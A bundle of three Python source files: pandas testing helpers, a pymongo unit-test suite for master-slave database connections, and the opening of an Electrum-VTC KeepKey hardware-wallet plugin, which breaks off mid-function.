random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = int(np.round((1 - density) * nrows * ncols))
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
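# A minimal usage sketch (illustrative only; the helper name below is made up).
# Note that `density` is the fraction of values that are kept, so density=0.9
# leaves roughly 10% of the cells as NaN.
def _demo_makeMissingDataframe():
    df = makeMissingDataframe(density=0.9, random_state=42)
    frac_missing = df.isna().values.mean()
    return df, frac_missing  # frac_missing is approximately 0.1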
def optional_args(decorator):
"""
allows a decorator to take optional positional and keyword arguments.
Assumes that taking a single, callable, positional argument means that
it is decorating a function, i.e. something like this::
@my_decorator
def function(): pass
Calls decorator with decorator(f, *args, **kwargs)
"""
@wraps(decorator)
def wrapper(*args, **kwargs):
def dec(f):
return decorator(f, *args, **kwargs)
is_decorating = not kwargs and len(args) == 1 and callable(args[0])
if is_decorating:
f = args[0]
args = []
return dec(f)
else:
return dec
return wrapper
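# A minimal usage sketch (illustrative only; the decorator `tag` and the
# decorated functions are made-up names). A decorator built with
# @optional_args can be applied both bare and with keyword arguments.
def _demo_optional_args():
    @optional_args
    def tag(f, label="default"):
        @wraps(f)
        def inner(*args, **kwargs):
            return label, f(*args, **kwargs)
        return inner

    @tag
    def plain():
        return 1

    @tag(label="custom")
    def labelled():
        return 2

    return plain(), labelled()  # (("default", 1), ("custom", 2))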
# skip tests on exceptions with this message
_network_error_messages = (
# 'urlopen error timed out',
# 'timeout: timed out',
# 'socket.timeout: timed out',
"timed out",
"Server Hangup",
"HTTP Error 503: Service Unavailable",
"502: Proxy Error",
"HTTP Error 502: internal error",
"HTTP Error 502",
"HTTP Error 503",
"HTTP Error 403",
"HTTP Error 400",
"Temporary failure in name resolution",
"Name or service not known",
"Connection refused",
"certificate verify",
)
# or this e.errno/e.reason.errno
_network_errno_vals = (
101, # Network is unreachable
111, # Connection refused
110, # Connection timed out
104, # Connection reset Error
54, # Connection reset by peer
60, # urllib.error.URLError: [Errno 60] Connection timed out
)
# Both of the above shouldn't mask real issues such as 404's
# or refused connections (changed DNS).
# But some tests (test_data yahoo) contact incredibly flakey
# servers.
# and conditionally raise on exception types in _get_default_network_errors
def _get_default_network_errors():
# Lazy import for http.client because it imports many things from the stdlib
import http.client
return (IOError, http.client.HTTPException, TimeoutError)
def can_connect(url, error_classes=None):
"""
Try to connect to the given url. True if succeeds, False if IOError
raised
Parameters
----------
url : basestring
The URL to try to connect to
Returns
-------
connectable : bool
Return True if no IOError (unable to connect) or URLError (bad url) was
raised
"""
if error_classes is None:
error_classes = _get_default_network_errors()
try:
with urlopen(url):
pass
except error_classes:
return False
else:
return True
@optional_args
def network(
t,
url="http://www.google.com",
raise_on_error=_RAISE_NETWORK_ERROR_DEFAULT,
check_before_test=False,
error_classes=None,
skip_errnos=_network_errno_vals,
_skip_on_messages=_network_error_messages,
):
"""
Label a test as requiring network connection and, if an error is
encountered, only raise if it does not find a network connection.
In comparison to ``network``, this assumes an added contract to your test:
you must assert that, under normal conditions, your test will ONLY fail if
it does not have network connectivity.
You can call this in 3 ways: as a standard decorator, with keyword
arguments, or with a positional argument that is the url to check.
Parameters
----------
t : callable
The test requiring network connectivity.
url : path
The url to test via ``pandas.io.common.urlopen`` to check
for connectivity. Defaults to 'http://www.google.com'.
raise_on_error : bool
If True, never catches errors.
check_before_test : bool
If True, checks connectivity before running the test case.
error_classes : tuple or Exception
error classes to ignore. If not in ``error_classes``, raises the error.
defaults to IOError. Be careful about changing the error classes here.
skip_errnos : iterable of int
        Any exception that has .errno or .reason.errno set to one
of these values will be skipped with an appropriate
message.
_skip_on_messages: iterable of string
any exception e for which one of the strings is
a substring of str(e) will be skipped with an appropriate
message. Intended to suppress errors where an errno isn't available.
Notes
-----
* ``raise_on_error`` supersedes ``check_before_test``
Returns
-------
t : callable
The decorated test ``t``, with checks for connectivity errors.
Example
-------
Tests decorated with @network will fail if it's possible to make a network
connection to another URL (defaults to google.com)::
>>> from pandas._testing import network
>>> from pandas.io.common import urlopen
>>> @network
... def test_network():
... with urlopen("rabbit://bonanza.com"):
... pass
    Traceback (most recent call last):
        ...
    URLError: <urlopen error unknown url type: rabbit>
You can specify alternative URLs::
>>> @network("http://www.yahoo.com")
... def test_something_with_yahoo():
... raise IOError("Failure Message")
>>> test_something_with_yahoo()
Traceback (most recent call last):
...
IOError: Failure Message
If you set check_before_test, it will check the url first and not run the
test on failure::
>>> @network("failing://url.blaher", check_before_test=True)
... def test_something():
... print("I ran!")
... raise ValueError("Failure")
>>> test_something()
Traceback (most recent call last):
...
Errors not related to networking will always be raised.
"""
from pytest import skip
if error_classes is None:
error_classes = _get_default_network_errors()
t.network = True
@wraps(t)
def wrapper(*args, **kwargs):
if check_before_test and not raise_on_error:
if not can_connect(url, error_classes):
skip()
try:
return t(*args, **kwargs)
except Exception as err:
errno = getattr(err, "errno", None)
            if not errno and hasattr(err, "reason"):
errno = getattr(err.reason, "errno", None)
if errno in skip_errnos:
skip(f"Skipping test due to known errno and error {err}")
e_str = str(err)
if any(m.lower() in e_str.lower() for m in _skip_on_messages):
skip(
f"Skipping test because exception message is known and error {err}"
)
if not isinstance(err, error_classes):
raise
if raise_on_error or can_connect(url, error_classes):
raise
else:
skip(f"Skipping test due to lack of connectivity and error {err}")
return wrapper
with_connectivity_check = network
@contextmanager
def assert_produces_warning(
expected_warning=Warning,
filter_level="always",
check_stacklevel=True,
raise_on_extra_warnings=True,
):
"""
Context manager for running code expected to either raise a specific
warning, or not raise any warnings. Verifies that the code raises the
expected warning, and that it does not raise any other unexpected
warnings. It is basically a wrapper around ``warnings.catch_warnings``.
Parameters
----------
expected_warning : {Warning, False, None}, default Warning
The type of Exception raised. ``exception.Warning`` is the base
class for all warnings. To check that no warning is returned,
specify ``False`` or ``None``.
filter_level : str or None, default "always"
Specifies whether warnings are ignored, displayed, or turned
into errors.
Valid values are:
* "error" - turns matching warnings into exceptions
* "ignore" - discard the warning
* "always" - always emit a warning
* "default" - print the warning the first time it is generated
from each location
* "module" - print the warning the first time it is generated
from each module
* "once" - print the warning the first time it is generated
check_stacklevel : bool, default True
If True, displays the line that called the function containing
        the warning to show where the function is called. Otherwise, the
line that implements the function is displayed.
raise_on_extra_warnings : bool, default True
Whether extra warnings not of the type `expected_warning` should
cause the test to fail.
Examples
--------
>>> import warnings
>>> with assert_produces_warning():
... warnings.warn(UserWarning())
...
>>> with assert_produces_warning(False):
... warnings.warn(RuntimeWarning())
...
Traceback (most recent call last):
...
AssertionError: Caused unexpected warning(s): ['RuntimeWarning'].
>>> with assert_produces_warning(UserWarning):
... warnings.warn(RuntimeWarning())
Traceback (most recent call last):
...
AssertionError: Did not see expected warning of class 'UserWarning'.
    .. warning:: This is *not* thread-safe.
"""
__tracebackhide__ = True
with warnings.catch_warnings(record=True) as w:
saw_warning = False
warnings.simplefilter(filter_level)
yield w
extra_warnings = []
for actual_warning in w:
if expected_warning and issubclass(
actual_warning.category, expected_warning
):
saw_warning = True
if check_stacklevel and issubclass(
actual_warning.category, (FutureWarning, DeprecationWarning)
):
from inspect import getframeinfo, stack
caller = getframeinfo(stack()[2][0])
msg = (
"Warning not set with correct stacklevel. "
f"File where warning is raised: {actual_warning.filename} != "
f"{caller.filename}. Warning message: {actual_warning.message}"
)
assert actual_warning.filename == caller.filename, msg
else:
extra_warnings.append(
(
actual_warning.category.__name__,
actual_warning.message,
actual_warning.filename,
actual_warning.lineno,
)
)
if expected_warning:
msg = (
f"Did not see expected warning of class "
f"{repr(expected_warning.__name__)}"
)
assert saw_warning, msg
if raise_on_extra_warnings and extra_warnings:
raise AssertionError(
f"Caused unexpected warning(s): {repr(extra_warnings)}"
)
class RNGContext:
"""
    Context manager to set the numpy random number generator seed. Returns
to the original value upon exiting the context manager.
Parameters
----------
seed : int
Seed for numpy.random.seed
Examples
--------
with RNGContext(42):
np.random.randn()
"""
def __init__(self, seed):
self.seed = seed
def __enter__(self):
self.start_state = np.random.get_state()
np.random.seed(self.seed)
def __exit__(self, exc_type, exc_value, traceback):
np.random.set_state(self.start_state)
@contextmanager
def with_csv_dialect(name, **kwargs):
"""
Context manager to temporarily register a CSV dialect for parsing CSV.
Parameters
----------
name : str
The name of the dialect.
kwargs : mapping
The parameters for the dialect.
Raises
------
ValueError : the name of the dialect conflicts with a builtin one.
See Also
--------
csv : Python's CSV library.
"""
import csv
_BUILTIN_DIALECTS = {"excel", "excel-tab", "unix"}
if name in _BUILTIN_DIALECTS:
raise ValueError("Cannot override builtin dialect.")
csv.register_dialect(name, **kwargs)
yield
csv.unregister_dialect(name)
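# A minimal usage sketch (illustrative only; the dialect name "pipes" and the
# helper name are made up). The dialect is only registered inside the with-block.
def _demo_with_csv_dialect():
    import csv
    from io import StringIO

    with with_csv_dialect("pipes", delimiter="|"):
        rows = list(csv.reader(StringIO("a|b|c"), dialect="pipes"))
    return rows  # [["a", "b", "c"]]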
@contextmanager
def use_numexpr(use, min_elements=None):
from pandas.core.computation import expressions as expr
if min_elements is None:
min_elements = expr._MIN_ELEMENTS
olduse = expr._USE_NUMEXPR
oldmin = expr._MIN_ELEMENTS
expr.set_use_numexpr(use)
expr._MIN_ELEMENTS = min_elements
yield
expr._MIN_ELEMENTS = oldmin
expr.set_use_numexpr(olduse)
def test_parallel(num_threads=2, kwargs_list=None):
"""
Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
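# A minimal usage sketch (illustrative only; the helper name is made up). The
# decorator discards return values, so results are collected via a shared list.
def _demo_test_parallel():
    results = []

    @test_parallel(num_threads=2)
    def append_one():
        results.append(1)

    append_one()
    return results  # [1, 1]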
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
@contextmanager
def set_timezone(tz: str):
"""
Context manager for temporarily setting a timezone.
Parameters
----------
tz : str
A string representing a valid timezone.
Examples
--------
>>> from datetime import datetime
>>> from dateutil.tz import tzlocal
>>> tzlocal().tzname(datetime.now())
'IST'
>>> with set_timezone('US/Eastern'):
... tzlocal().tzname(datetime.now())
...
'EDT'
"""
import os
import time
def setTZ(tz):
if tz is None:
try:
del os.environ["TZ"]
except KeyError:
pass
else:
os.environ["TZ"] = tz
time.tzset()
orig_tz = os.environ.get("TZ")
setTZ(tz)
try:
yield
finally:
setTZ(orig_tz)
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
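# A minimal usage sketch (illustrative only; the helper name is made up):
# wrapping np.sum so NaNs are dropped before reducing.
def _demo_make_skipna_wrapper():
    wrapped = _make_skipna_wrapper(np.sum)
    return wrapped(Series([1.0, np.nan, 2.0]))  # 3.0; an all-NaN Series gives NaN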
def convert_rows_list_to_csv_str(rows_list: List[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
expected = sep.join(rows_list) + sep
return expected
def external_error_raised(
expected_exception: Type[Exception],
) -> Callable[[Type[Exception], None], None]:
"""
Helper function to mark pytest.raises that have an external error message.
Parameters
----------
expected_exception : Exception
Expected error to raise.
Returns
-------
Callable
Regular `pytest.raises` function with `match` equal to `None`.
"""
import pytest
return pytest.raises(expected_exception, match=None)
|
test_master_slave_connection.py
|
# Copyright 2009-2014 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test for master slave connections."""
import datetime
import os
import sys
import threading
import time
import unittest
sys.path[0:0] = [""]
from nose.plugins.skip import SkipTest
from bson.son import SON
from bson.tz_util import utc
from pymongo import ReadPreference, thread_util
from pymongo.errors import ConnectionFailure, InvalidName
from pymongo.errors import CollectionInvalid, OperationFailure
from pymongo.errors import AutoReconnect
from pymongo.database import Database
from pymongo.mongo_client import MongoClient
from pymongo.collection import Collection
from pymongo.master_slave_connection import MasterSlaveConnection
from test import host, port, host2, port2, host3, port3
from test.utils import TestRequestMixin, get_pool
class TestMasterSlaveConnection(unittest.TestCase, TestRequestMixin):
def setUp(self):
self.master = MongoClient(host, port)
self.slaves = []
try:
self.slaves.append(MongoClient(
host2, port2, read_preference=ReadPreference.SECONDARY))
except ConnectionFailure:
pass
try:
self.slaves.append(MongoClient(
host3, port3, read_preference=ReadPreference.SECONDARY))
except ConnectionFailure:
pass
if not self.slaves:
raise SkipTest("Not connected to master-slave set")
self.client = MasterSlaveConnection(self.master, self.slaves)
self.db = self.client.pymongo_test
def tearDown(self):
try:
self.db.test.drop_indexes()
except Exception:
# Tests like test_disconnect can monkey with the client in ways
# that make this fail
pass
self.master = self.slaves = self.db = self.client = None
super(TestMasterSlaveConnection, self).tearDown()
def test_types(self):
self.assertRaises(TypeError, MasterSlaveConnection, 1)
self.assertRaises(TypeError, MasterSlaveConnection, self.master, 1)
self.assertRaises(TypeError, MasterSlaveConnection, self.master, [1])
def test_use_greenlets(self):
self.assertFalse(self.client.use_greenlets)
if thread_util.have_gevent:
master = MongoClient(host, port, use_greenlets=True)
slaves = [
MongoClient(slave.host, slave.port, use_greenlets=True)
for slave in self.slaves]
self.assertTrue(
MasterSlaveConnection(master, slaves).use_greenlets)
def test_repr(self):
self.assertEqual(repr(self.client),
"MasterSlaveConnection(%r, %r)" %
(self.master, self.slaves))
def test_disconnect(self):
class MongoClient(object):
def __init__(self):
self._disconnects = 0
def disconnect(self):
self._disconnects += 1
self.client._MasterSlaveConnection__master = MongoClient()
self.client._MasterSlaveConnection__slaves = [MongoClient(),
MongoClient()]
self.client.disconnect()
self.assertEqual(1,
self.client._MasterSlaveConnection__master._disconnects)
self.assertEqual(1,
self.client._MasterSlaveConnection__slaves[0]._disconnects)
self.assertEqual(1,
self.client._MasterSlaveConnection__slaves[1]._disconnects)
def test_continue_until_slave_works(self):
class Slave(object):
calls = 0
def __init__(self, fail):
self._fail = fail
def _send_message_with_response(self, *args, **kwargs):
Slave.calls += 1
if self._fail:
raise AutoReconnect()
return (None, 'sent')
class NotRandomList(object):
last_idx = -1
def __init__(self):
self._items = [Slave(True), Slave(True),
Slave(False), Slave(True)]
def __len__(self):
return len(self._items)
def __getitem__(self, idx):
NotRandomList.last_idx = idx
return self._items.pop(0)
self.client._MasterSlaveConnection__slaves = NotRandomList()
response = self.client._send_message_with_response('message')
self.assertEqual((NotRandomList.last_idx, 'sent'), response)
self.assertNotEqual(-1, NotRandomList.last_idx)
self.assertEqual(3, Slave.calls)
def test_raise_autoreconnect_if_all_slaves_fail(self):
class Slave(object):
calls = 0
def __init__(self, fail):
self._fail = fail
def _send_message_with_response(self, *args, **kwargs):
Slave.calls += 1
if self._fail:
raise AutoReconnect()
return 'sent'
class NotRandomList(object):
def __init__(self):
self._items = [Slave(True), Slave(True),
Slave(True), Slave(True)]
def __len__(self):
return len(self._items)
def __getitem__(self, idx):
return self._items.pop(0)
self.client._MasterSlaveConnection__slaves = NotRandomList()
self.assertRaises(AutoReconnect,
self.client._send_message_with_response, 'message')
self.assertEqual(4, Slave.calls)
def test_get_db(self):
def make_db(base, name):
return base[name]
self.assertRaises(InvalidName, make_db, self.client, "")
self.assertRaises(InvalidName, make_db, self.client, "te$t")
self.assertRaises(InvalidName, make_db, self.client, "te.t")
self.assertRaises(InvalidName, make_db, self.client, "te\\t")
self.assertRaises(InvalidName, make_db, self.client, "te/t")
self.assertRaises(InvalidName, make_db, self.client, "te st")
self.assertTrue(isinstance(self.client.test, Database))
self.assertEqual(self.client.test, self.client["test"])
self.assertEqual(self.client.test, Database(self.client,
"test"))
def test_database_names(self):
self.client.pymongo_test.test.save({"dummy": u"object"})
self.client.pymongo_test_mike.test.save({"dummy": u"object"})
dbs = self.client.database_names()
self.assertTrue("pymongo_test" in dbs)
self.assertTrue("pymongo_test_mike" in dbs)
def test_drop_database(self):
self.assertRaises(TypeError, self.client.drop_database, 5)
self.assertRaises(TypeError, self.client.drop_database, None)
raise SkipTest("This test often fails due to SERVER-2329")
self.client.pymongo_test.test.save({"dummy": u"object"})
dbs = self.client.database_names()
self.assertTrue("pymongo_test" in dbs)
self.client.drop_database("pymongo_test")
dbs = self.client.database_names()
self.assertTrue("pymongo_test" not in dbs)
self.client.pymongo_test.test.save({"dummy": u"object"})
dbs = self.client.database_names()
self.assertTrue("pymongo_test" in dbs)
self.client.drop_database(self.client.pymongo_test)
dbs = self.client.database_names()
self.assertTrue("pymongo_test" not in dbs)
def test_iteration(self):
def iterate():
[a for a in self.client]
self.assertRaises(TypeError, iterate)
def test_insert_find_one_in_request(self):
count = 0
for i in range(100):
self.client.start_request()
self.db.test.remove({})
self.db.test.insert({"x": i})
try:
if i != self.db.test.find_one()["x"]:
count += 1
except:
count += 1
self.client.end_request()
self.assertFalse(count)
def test_nested_request(self):
client = self.client
def assertRequest(in_request):
self.assertEqual(in_request, client.in_request())
self.assertEqual(in_request, client.master.in_request())
# MasterSlaveConnection is special, alas - it has no auto_start_request
# and it begins *not* in a request. When it's in a request, it sends
# all queries to primary.
self.assertFalse(client.in_request())
self.assertFalse(client.master.in_request())
# Start and end request
client.start_request()
assertRequest(True)
client.end_request()
assertRequest(False)
# Double-nesting
client.start_request()
client.start_request()
client.end_request()
assertRequest(True)
client.end_request()
assertRequest(False)
def test_request_threads(self):
client = self.client
# In a request, all ops go through master
pool = get_pool(client.master)
client.master.end_request()
self.assertNotInRequestAndDifferentSock(client, pool)
started_request, ended_request = threading.Event(), threading.Event()
checked_request = threading.Event()
thread_done = [False]
# Starting a request in one thread doesn't put the other thread in a
# request
def f():
self.assertNotInRequestAndDifferentSock(client, pool)
client.start_request()
self.assertInRequestAndSameSock(client, pool)
started_request.set()
checked_request.wait()
checked_request.clear()
self.assertInRequestAndSameSock(client, pool)
client.end_request()
self.assertNotInRequestAndDifferentSock(client, pool)
ended_request.set()
checked_request.wait()
thread_done[0] = True
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
started_request.wait()
self.assertNotInRequestAndDifferentSock(client, pool)
checked_request.set()
ended_request.wait()
self.assertNotInRequestAndDifferentSock(client, pool)
checked_request.set()
t.join()
self.assertNotInRequestAndDifferentSock(client, pool)
self.assertTrue(thread_done[0], "Thread didn't complete")
# This was failing because commands were being sent to the slaves
def test_create_collection(self):
self.client.pymongo_test.test.drop()
collection = self.db.create_collection('test')
self.assertTrue(isinstance(collection, Collection))
self.assertRaises(CollectionInvalid, self.db.create_collection, 'test')
# Believe this was failing for the same reason...
def test_unique_index(self):
self.client.pymongo_test.test.drop()
self.db.test.create_index('username', unique=True)
self.db.test.save({'username': 'mike'})
self.assertRaises(OperationFailure,
self.db.test.save, {'username': 'mike'})
# NOTE this test is non-deterministic, but I expect
# some failures unless the db is pulling instantaneously...
def test_insert_find_one_with_slaves(self):
count = 0
for i in range(100):
self.db.test.remove({})
self.db.test.insert({"x": i})
try:
if i != self.db.test.find_one()["x"]:
count += 1
except:
count += 1
self.assertTrue(count)
# NOTE this test is non-deterministic, but hopefully we pause long enough
# for the slaves to pull...
def test_insert_find_one_with_pause(self):
count = 0
self.db.test.remove({})
self.db.test.insert({"x": 5586})
time.sleep(11)
for _ in range(10):
try:
if 5586 != self.db.test.find_one()["x"]:
count += 1
except:
count += 1
self.assertFalse(count)
def test_kill_cursor_explicit(self):
c = self.client
c.slave_okay = True
db = c.pymongo_test
test = db.master_slave_test_kill_cursor_explicit
test.drop()
for i in range(20):
test.insert({"i": i}, w=1 + len(self.slaves))
st = time.time()
while time.time() - st < 120:
# Wait for replication -- the 'w' parameter should obviate this
# loop but it's not working reliably in Jenkins right now
if list(test.find({"i": 19})):
break
time.sleep(0.5)
else:
self.fail("Replication timeout, test coll has %s records" % (
len(list(test.find()))
))
# Partially evaluate cursor so it's left alive, then kill it
cursor = test.find().batch_size(10)
self.assertNotEqual(
cursor._Cursor__connection_id,
-1,
"Expected cursor connected to a slave, not master")
self.assertTrue(cursor.next())
self.assertNotEqual(0, cursor.cursor_id)
cursor_id = cursor.cursor_id
# Cursor dead on server - trigger a getMore on the same cursor_id and
# check that the server returns an error.
cursor2 = cursor.clone()
cursor2._Cursor__id = cursor_id
if (sys.platform.startswith('java') or
'PyPy' in sys.version):
# Explicitly kill cursor.
cursor.close()
else:
# Implicitly kill it in CPython.
del cursor
self.assertRaises(OperationFailure, lambda: list(cursor2))
def test_base_object(self):
c = self.client
self.assertFalse(c.slave_okay)
self.assertTrue(bool(c.read_preference))
self.assertTrue(c.safe)
self.assertEqual({}, c.get_lasterror_options())
db = c.pymongo_test
self.assertFalse(db.slave_okay)
self.assertTrue(bool(c.read_preference))
self.assertTrue(db.safe)
self.assertEqual({}, db.get_lasterror_options())
coll = db.test
coll.drop()
self.assertFalse(coll.slave_okay)
self.assertTrue(bool(c.read_preference))
self.assertTrue(coll.safe)
self.assertEqual({}, coll.get_lasterror_options())
cursor = coll.find()
self.assertFalse(cursor._Cursor__slave_okay)
self.assertTrue(bool(cursor._Cursor__read_preference))
w = 1 + len(self.slaves)
        wtimeout = 10000  # Wait 10 seconds for replication to complete
c.set_lasterror_options(w=w, wtimeout=wtimeout)
self.assertFalse(c.slave_okay)
self.assertTrue(bool(c.read_preference))
self.assertTrue(c.safe)
self.assertEqual({'w': w, 'wtimeout': wtimeout}, c.get_lasterror_options())
db = c.pymongo_test
self.assertFalse(db.slave_okay)
self.assertTrue(bool(c.read_preference))
self.assertTrue(db.safe)
self.assertEqual({'w': w, 'wtimeout': wtimeout}, db.get_lasterror_options())
coll = db.test
self.assertFalse(coll.slave_okay)
self.assertTrue(bool(c.read_preference))
self.assertTrue(coll.safe)
self.assertEqual({'w': w, 'wtimeout': wtimeout},
coll.get_lasterror_options())
cursor = coll.find()
self.assertFalse(cursor._Cursor__slave_okay)
self.assertTrue(bool(cursor._Cursor__read_preference))
coll.insert({'foo': 'bar'})
self.assertEqual(1, coll.find({'foo': 'bar'}).count())
self.assertTrue(coll.find({'foo': 'bar'}))
coll.remove({'foo': 'bar'})
self.assertEqual(0, coll.find({'foo': 'bar'}).count())
c.safe = False
c.unset_lasterror_options()
self.assertFalse(self.client.slave_okay)
self.assertTrue(bool(self.client.read_preference))
self.assertFalse(self.client.safe)
self.assertEqual({}, self.client.get_lasterror_options())
def test_document_class(self):
c = MasterSlaveConnection(self.master, self.slaves)
db = c.pymongo_test
w = 1 + len(self.slaves)
db.test.insert({"x": 1}, w=w)
self.assertEqual(dict, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), dict))
self.assertFalse(isinstance(db.test.find_one(), SON))
c.document_class = SON
self.assertEqual(SON, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), SON))
self.assertFalse(isinstance(db.test.find_one(as_class=dict), SON))
c = MasterSlaveConnection(self.master, self.slaves, document_class=SON)
db = c.pymongo_test
self.assertEqual(SON, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), SON))
self.assertFalse(isinstance(db.test.find_one(as_class=dict), SON))
c.document_class = dict
self.assertEqual(dict, c.document_class)
self.assertTrue(isinstance(db.test.find_one(), dict))
self.assertFalse(isinstance(db.test.find_one(), SON))
def test_tz_aware(self):
dt = datetime.datetime.utcnow()
client = MasterSlaveConnection(self.master, self.slaves)
self.assertEqual(False, client.tz_aware)
db = client.pymongo_test
w = 1 + len(self.slaves)
db.tztest.insert({'dt': dt}, w=w)
self.assertEqual(None, db.tztest.find_one()['dt'].tzinfo)
client = MasterSlaveConnection(self.master, self.slaves, tz_aware=True)
self.assertEqual(True, client.tz_aware)
db = client.pymongo_test
db.tztest.insert({'dt': dt}, w=w)
self.assertEqual(utc, db.tztest.find_one()['dt'].tzinfo)
client = MasterSlaveConnection(self.master, self.slaves, tz_aware=False)
self.assertEqual(False, client.tz_aware)
db = client.pymongo_test
db.tztest.insert({'dt': dt}, w=w)
self.assertEqual(None, db.tztest.find_one()['dt'].tzinfo)
if __name__ == "__main__":
unittest.main()
|
keepkey.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from typing import NamedTuple, Any, Optional, Dict, Union, List, Tuple, TYPE_CHECKING
from electrum_vtc.util import bfh, bh2u, UserCancelled, UserFacingException
from electrum_vtc.bip32 import BIP32Node
from electrum_vtc import constants
from electrum_vtc.i18n import _
from electrum_vtc.transaction import Transaction, PartialTransaction, PartialTxInput, PartialTxOutput
from electrum_vtc.keystore import Hardware_KeyStore
from electrum_vtc.plugin import Device, runs_in_hwd_thread
from electrum_vtc.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import (is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data,
get_xpubs_and_der_suffixes_from_txinout)
if TYPE_CHECKING:
import usb1
from .client import KeepKeyClient
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKey_KeyStore(Hardware_KeyStore):
hw_type = 'keepkey'
device = 'KeepKey'
plugin: 'KeepKeyPlugin'
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
@runs_in_hwd_thread
def sign_message(self, sequence, message, password, *, script_type=None):
client = self.get_client()
address_path = self.get_derivation_prefix() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
@runs_in_hwd_thread
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
for txin in tx.inputs():
tx_hash = txin.prevout.txid.hex()
if txin.utxo is None and not txin.is_segwit():
raise UserFacingException(_('Missing previous tx for legacy input.'))
prev_tx[tx_hash] = txin.utxo
self.plugin.sign_transaction(self, tx, prev_tx)
class KeepKeyPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
firmware_URL = 'https://www.keepkey.com'
libraries_URL = 'https://github.com/keepkey/python-keepkey'
minimum_firmware = (1, 0, 0)
keystore_class = KeepKey_KeyStore
SUPPORTED_XTYPES = ('standard', 'p2wpkh-p2sh', 'p2wpkh', 'p2wsh-p2sh', 'p2wsh')
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
try:
from . import client
import keepkeylib
import keepkeylib.ckd_public
import keepkeylib.transport_hid
import keepkeylib.transport_webusb
self.client_class = client.KeepKeyClient
self.ckd_public = keepkeylib.ckd_public
self.types = keepkeylib.client.types
self.DEVICE_IDS = (keepkeylib.transport_hid.DEVICE_IDS +
keepkeylib.transport_webusb.DEVICE_IDS)
# only "register" hid device id:
self.device_manager().register_devices(keepkeylib.transport_hid.DEVICE_IDS, plugin=self)
# for webusb transport, use custom enumerate function:
self.device_manager().register_enumerate_func(self.enumerate)
self.libraries_available = True
except ImportError:
self.libraries_available = False
@runs_in_hwd_thread
def enumerate(self):
from keepkeylib.transport_webusb import WebUsbTransport
results = []
for dev in WebUsbTransport.enumerate():
path = self._dev_to_str(dev)
results.append(Device(path=path,
interface_number=-1,
id_=path,
product_key=(dev.getVendorID(), dev.getProductID()),
usage_page=0,
transport_ui_string=f"webusb:{path}"))
return results
@staticmethod
def _dev_to_str(dev: "usb1.USBDevice") -> str:
